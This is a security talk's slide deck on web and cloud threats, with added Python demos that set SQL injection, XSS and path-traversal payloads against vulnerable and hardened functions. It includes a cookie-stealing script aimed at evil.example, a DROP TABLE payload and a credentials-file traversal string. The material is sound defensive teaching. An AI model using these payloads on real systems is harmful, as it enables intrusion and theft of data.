Web & Cloud Security in the Real World
Madhu Akula (@madhuakula)
Published: Presented as a keynote speaker at Dayananda Sagar College, at an event conducted by CompTIA.

Published in: Technology
1. Web & Cloud Security in the Real World
Madhu Akula, @madhuakula
2. Madhu Akula - Profile
• Information Security Researcher
• Chapter Lead & Speaker, null
• Acknowledged by US Department of Homeland Security
• Found bugs in Google, Microsoft, Yahoo, Adobe, etc.
• Open Source Contributor
• Interested in Automation & DevOps
• Never-ending learner!
www.madhuakula.com
3. This is for educational purposes only; I am not responsible for any illegal activities done by anyone.
4. Let’s talk about Social Engineering
5. My Experience!
6. Fake Emails
7. Demo
8. Data Breaches in the Wild
http://www.idtheftcenter.org/ITRC-Surveys-
9. Sample Web Architecture
10. Web Security Statistics
http://www.imperva.com/docs/HII_Web_Application_Attack_Report_
11. Common Web Attacks
• Cross Site Scripting (XSS)
• SQL Injection
• Information Disclosure
• Remote Code Execution
Recent:
• Cross Site Port Attacks
• Reflected File Download
• Etc.
12. SQL Injection
• SQL injection is one of the most used attack vectors when attackers want to build a new botnet.
• SQL injection occurs when untrusted data is sent to an interpreter as part of a command or query.
• It can let the attacker read, modify or delete data and take control of the database.
13. SQL Injection Attack
• A number plate crafted to foil an automatic licence plate scanner!
• An attack which allows SQL to be executed as part of the input.
14. Bobby Tables!
https://www.explainxkcd.com/wiki/index.php/327:_Exploits_of_a_Mom
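Added example, not from the original slides: the two injection shapes the SQL injection slides allude to, run against a throw-away SQLite database. The table, rows and payloads are constructed for the demo; sqlite3's execute() refuses stacked statements, so executescript() stands in for a driver or configuration that accepts them (the Bobby Tables case).

```python
import sqlite3


def setup_db():
    """Throw-away in-memory database with a few constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE students (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    conn.executemany("INSERT INTO students (name) VALUES (?)",
                     [("Alice",), ("Bob",), ("Carol",)])
    conn.commit()
    return conn


def find_students_vulnerable(conn, name):
    # Untrusted input is pasted straight into the SQL text: the injection bug.
    sql = f"SELECT name FROM students WHERE name = '{name}' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def find_students_safe(conn, name):
    # Parameterised query: the driver sends the value separately from the
    # statement, so quotes in the input can never change the query's structure.
    rows = conn.execute("SELECT name FROM students WHERE name = ? ORDER BY id", (name,))
    return [row[0] for row in rows]


def add_student_vulnerable(conn, name):
    # executescript() runs stacked statements, as many real drivers/configs do,
    # so a ';' in the input lets the attacker append a statement of their own.
    conn.executescript(f"INSERT INTO students (name) VALUES ('{name}');")


def add_student_safe(conn, name):
    conn.execute("INSERT INTO students (name) VALUES (?)", (name,))
    conn.commit()


def table_exists(conn, table):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (table,)
    ).fetchone()
    return row is not None


TAUTOLOGY = "' OR '1'='1"                    # turns the WHERE clause into "always true"
BOBBY = "Robert'); DROP TABLE students;--"    # xkcd 327, stacked-statement form


def demo():
    """Run both payloads against the vulnerable and the safe functions."""
    conn = setup_db()
    results = {
        "vuln_tautology": find_students_vulnerable(conn, TAUTOLOGY),  # every row leaks
        "safe_tautology": find_students_safe(conn, TAUTOLOGY),        # no such student
    }
    add_student_safe(conn, BOBBY)           # stored as a literal name, harmless
    results["safe_bobby_table_exists"] = table_exists(conn, "students")
    results["safe_bobby_rows"] = find_students_safe(conn, BOBBY)
    add_student_vulnerable(conn, BOBBY)     # INSERT, then DROP TABLE, then a comment
    results["vuln_bobby_table_exists"] = table_exists(conn, "students")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The fix is the same in both cases: keep the query text fixed and let the driver carry the value as a parameter, so quotes and semicolons in the input stay data instead of becoming SQL.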
15. Cross Site Scripting
• An XSS flaw occurs whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping.
• XSS allows attackers to execute scripts in the victim’s browser, which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
16. Example
• One of the most infamous examples is the MySpace Samy worm. In less than a day its author got more than a million friends and MySpace had to be shut down.
• An XSS bug on the website registration page can enable theft of registration details.
• There are many exploitation frameworks for this vulnerability, like BeEF, Xenotix, etc.
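Added example, not from the original slides: the "without proper escaping" bug from the XSS slide beside its fixed form, using Python's html.escape, and two cases the plain fix does not cover: an attribute breakout when quotes are left unescaped, and a value placed inside an inline script, where entity encoding is the wrong tool. The payloads, the profile markup and the evil.example host are constructed for the demo.

```python
import html
import json

# Constructed sample inputs: a script payload stored in a profile field (the
# Samy-style case) and a value that tries to break out of an HTML attribute.
SCRIPT_PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" onmouseover="alert(1)'


def render_profile_vulnerable(display_name):
    # Untrusted data concatenated into HTML with no escaping: the XSS bug.
    return f"<h1>Hello, {display_name}</h1>"


def render_profile_safe(display_name):
    # HTML text context: <, >, & and quotes become entities, so the browser
    # shows the payload as text instead of executing it.
    return f"<h1>Hello, {html.escape(display_name)}</h1>"


def render_link_quote_off(title):
    # Common mistake: escaping angle brackets but not quotes is not enough
    # inside a quoted attribute; the input closes the attribute and adds its own.
    return f'<a href="/profile" title="{html.escape(title, quote=False)}">me</a>'


def render_link_safe(title):
    # Default html.escape(quote=True) also encodes " and ', closing the breakout.
    return f'<a href="/profile" title="{html.escape(title)}">me</a>'


def render_inline_script_safe(display_name):
    # JavaScript string context: serialise with json.dumps (handles quotes,
    # backslashes and newlines) and neutralise "</" so the value can never
    # terminate the enclosing <script> element.
    js_literal = json.dumps(display_name).replace("</", "<\\/")
    return f"<script>var user = {js_literal};</script>"


def demo():
    """Render each payload through the vulnerable and the hardened functions."""
    return {
        "vuln": render_profile_vulnerable(SCRIPT_PAYLOAD),
        "safe": render_profile_safe(SCRIPT_PAYLOAD),
        "attr_quote_off": render_link_quote_off(ATTR_PAYLOAD),
        "attr_safe": render_link_safe(ATTR_PAYLOAD),
        "js_safe": render_inline_script_safe(SCRIPT_PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of the last two functions is that escaping is context-specific: the same user value needs different encoding in element text, in an attribute and inside a script, which is why template engines with automatic contextual escaping beat hand-written html.escape calls.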
17. Information Disclosure
• Good security requires having a secure configuration defined and deployed for the applications, frameworks, application server, web server, database server, and platform.
18. Example
Network Solutions were offering WordPress installation on a shared server. The main configuration file wp-config.php was world readable. This led to a mass hack of WordPress-based websites.
19. Remote Code Execution
An attacker's ability to execute any commands of the attacker's choice on a target machine or in a target process.
20. Recent Popular Zero Days
• Java Deserialization Vulnerability
• VENOM Vulnerability
• SSL/TLS related: BEAST, POODLE and Heartbleed Vulnerabilities
• Shellshock Vulnerability
• Etc.
21. Demo
22. Let’s talk about Cloud
23. Threats: Service Provider vs On-Premise
https://www.rackspace.com/knowledge_center/whitepaper/alert-logic-state-of-cloud-security-report-
24. App Insecurity Scenario
• App has a Local File Inclusion bug
• The AWS root credentials are being used
• They are stored in a world-readable file on the server
• Attacker reads the credentials and starts multiple large instances to mine bitcoins
• Victim is saddled with a massive bill at the end of the month
http://www.slideshare.net/akashm/security-in-the-cloud-workshop-
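Added example, not from the original slides: the first step of the App Insecurity Scenario, a local file inclusion handler that follows "../" out of the web root to a world-readable AWS credentials file, beside a hardened handler that resolves the path and refuses anything outside the web root. The directory layout and the key values are constructed placeholders written to a temporary directory; nothing here touches real AWS credentials.

```python
import os
import tempfile
from pathlib import Path


def build_fixture():
    """Constructed on-disk layout for the demo: a web root with one page, plus
    an AWS credentials file outside the web root that is world readable, as in
    the scenario. The key values are placeholders, not real credentials."""
    base = Path(tempfile.mkdtemp())
    webroot = base / "app" / "pages"
    webroot.mkdir(parents=True)
    (webroot / "about.html").write_text("<h1>About us</h1>\n")
    creds = base / ".aws" / "credentials"
    creds.parent.mkdir()
    creds.write_text(
        "[default]\n"
        "aws_access_key_id = AKIAEXAMPLEPLACEHOLDER\n"
        "aws_secret_access_key = EXAMPLE_SECRET_PLACEHOLDER\n"
    )
    creds.chmod(0o644)   # world readable: the misconfiguration in the scenario
    return webroot


def include_page_vulnerable(webroot, page):
    # os.path.join() happily follows "../" (or an absolute path) out of the web root.
    with open(os.path.join(str(webroot), page)) as fh:
        return fh.read()


def include_page_safe(webroot, page):
    # Resolve the requested path and refuse anything that does not stay under
    # the web root. relative_to() raises for "../" chains, absolute paths and
    # symlinks that resolve elsewhere.
    root = Path(webroot).resolve()
    target = (root / page).resolve()
    try:
        target.relative_to(root)
    except ValueError:
        raise PermissionError(f"refused: {page!r} escapes the web root") from None
    return target.read_text()


TRAVERSAL = "../../.aws/credentials"   # the attacker's page parameter


def attacker_reads_credentials(webroot):
    """What the attacker gets back from the vulnerable handler."""
    return include_page_vulnerable(webroot, TRAVERSAL)


def safe_handler_blocks(webroot):
    """True when the hardened handler refuses the same payload."""
    try:
        include_page_safe(webroot, TRAVERSAL)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    root = build_fixture()
    print(attacker_reads_credentials(root))
    print("hardened handler blocked traversal:", safe_handler_blocks(root))
    print(include_page_safe(root, "about.html"))
```

The scenario needs two separate fixes. The path check above closes the inclusion bug, but the credentials should not be the account's root keys in a file at all: an IAM role attached to the instance gives the app short-lived credentials scoped to what it actually needs, so a file read alone no longer buys the attacker the whole account.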
25. Infra Insecurity Scenario
• MySQL production database is listening on an external port
• Developers work directly on the production database, which requires SQL management software
• They log in using the root user of the MySQL database server and a simple password
• Attacker runs a brute-force script, cracks the password and gains full access to the database
http://www.slideshare.net/akashm/security-in-the-cloud-workshop-
26. Heartbleed
https://xkcd.com/1354/
27. Data Insecurity Scenario
• Database is getting backed up regularly.
• Due to performance reasons, the database wasn’t encrypted when the initial backups were done.
• Dev team moves to newer SSDs and doesn’t decommission the older HDDs.
• Attacker finds the older HDDs, does forensic data recovery and sells the data for profit.
http://www.slideshare.net/akashm/security-in-the-cloud-workshop-
28. 10 Steps for Cloud
• Enumerate all the network interfaces
• List all the running services
• Harden each service separately based on best practices
• Secure remote access for server management (SSH, RDP)
• Check operating system patch levels
29. 10 Steps for Cloud (continued)
• Harden networking parameters of the kernel (Linux)
• Enable a host firewall
• Inventory all user accounts on the server and audit them
• Enable centralized logging
• Enable encryption on disks, storage, etc.
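Added example, not from the original slides, covering both the Infra Insecurity Scenario (slide 25) and the "list all the running services" and "inventory all user accounts" steps of the 10 Steps (slides 28-29): a small host audit that flags services listening on a non-loopback address outside an allowed port list, lists accounts with a real login shell, and checks the MySQL bind-address. The three inputs are constructed samples in the layout of `ss -Hltn` output, /etc/passwd and a my.cnf fragment; the allowed-port policy is an assumption for the example, not a rule from the slides.

```python
import ipaddress

# Constructed sample data, not from a real host. SAMPLE_SS follows the column
# layout of `ss -Hltn` (State Recv-Q Send-Q Local-Address:Port Peer-Address:Port).
SAMPLE_SS = """\
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 80 0.0.0.0:3306 0.0.0.0:*
LISTEN 0 128 127.0.0.1:6379 0.0.0.0:*
LISTEN 0 511 [::]:443 [::]:*
LISTEN 0 128 10.0.1.5:9200 0.0.0.0:*
"""

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mysql:x:110:115:MySQL Server:/nonexistent:/bin/false
deploy:x:1000:1000::/home/deploy:/bin/bash
olddev:x:1001:1001::/home/olddev:/bin/bash
"""

SAMPLE_MYCNF = """\
[mysqld]
bind-address = 0.0.0.0
port = 3306
"""

# Assumed policy for the example: only these ports may listen on a non-loopback address.
PUBLIC_PORTS = {22, 80, 443}
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def parse_listeners(ss_output):
    """Return (address, port) for every LISTEN line in ss output."""
    listeners = []
    for line in ss_output.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] != "LISTEN":
            continue
        addr, port = parts[3].rsplit(":", 1)
        addr = addr.strip("[]")          # IPv6 addresses are printed as [addr]:port
        if addr == "*":                  # some ss versions print '*' for a wildcard bind
            addr = "0.0.0.0"
        listeners.append((addr, int(port)))
    return listeners


def exposed_services(ss_output, allowed=PUBLIC_PORTS):
    """Listeners reachable from the network (not loopback) on ports outside the allowlist."""
    return [
        (addr, port)
        for addr, port in parse_listeners(ss_output)
        if not ipaddress.ip_address(addr).is_loopback and port not in allowed
    ]


def interactive_accounts(passwd_text):
    """Accounts with a real login shell: the list to review in the user inventory."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[6] not in NOLOGIN_SHELLS:
            users.append(fields[0])
    return users


def mysql_bind_address(mycnf_text):
    """bind-address from a my.cnf fragment, or None if it is not set."""
    for line in mycnf_text.splitlines():
        key, _, value = line.partition("=")
        if key.strip() == "bind-address":
            return value.strip()
    return None


def is_local_bind(addr):
    """True only for a loopback bind; None, 'localhost' and garbage handled explicitly."""
    if addr is None:
        return False
    if addr == "localhost":
        return True
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


def audit(ss_output=SAMPLE_SS, passwd_text=SAMPLE_PASSWD, mycnf_text=SAMPLE_MYCNF):
    """Collect the findings a reviewer would want from the three inputs."""
    bind = mysql_bind_address(mycnf_text)
    return {
        "exposed": exposed_services(ss_output),
        "login_accounts": interactive_accounts(passwd_text),
        "mysql_bind": bind,
        "mysql_local_only": is_local_bind(bind),
    }


if __name__ == "__main__":
    for key, value in audit().items():
        print(f"{key}: {value}")
```

On the sample data the audit flags MySQL on 0.0.0.0:3306 and a second service on 10.0.1.5:9200, lists three accounts with shells (including the stale olddev), and reports that MySQL is not bound to loopback. The remediation for slide 25 follows directly: set bind-address to 127.0.0.1, give developers a non-root MySQL account with a strong password, and have them reach the database over the secured management channel from step 4 (an SSH tunnel) rather than an open port.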
30. Misuses of Cloud (Recent Attacks)
http://thehackernews.com/
31. Resources
• null – null.co.in
• Security Tube – securitytube.net
• OWASP – owasp.org
• CSA – cloudsecurityalliance.org
• Google – Google.com
32. My info while I answer your questions
Madhu Akula
Information Security Researcher
www.madhuakula.com
Twitter: @madhuakula
madhu.akula@hotmail.com | +91-9676865642
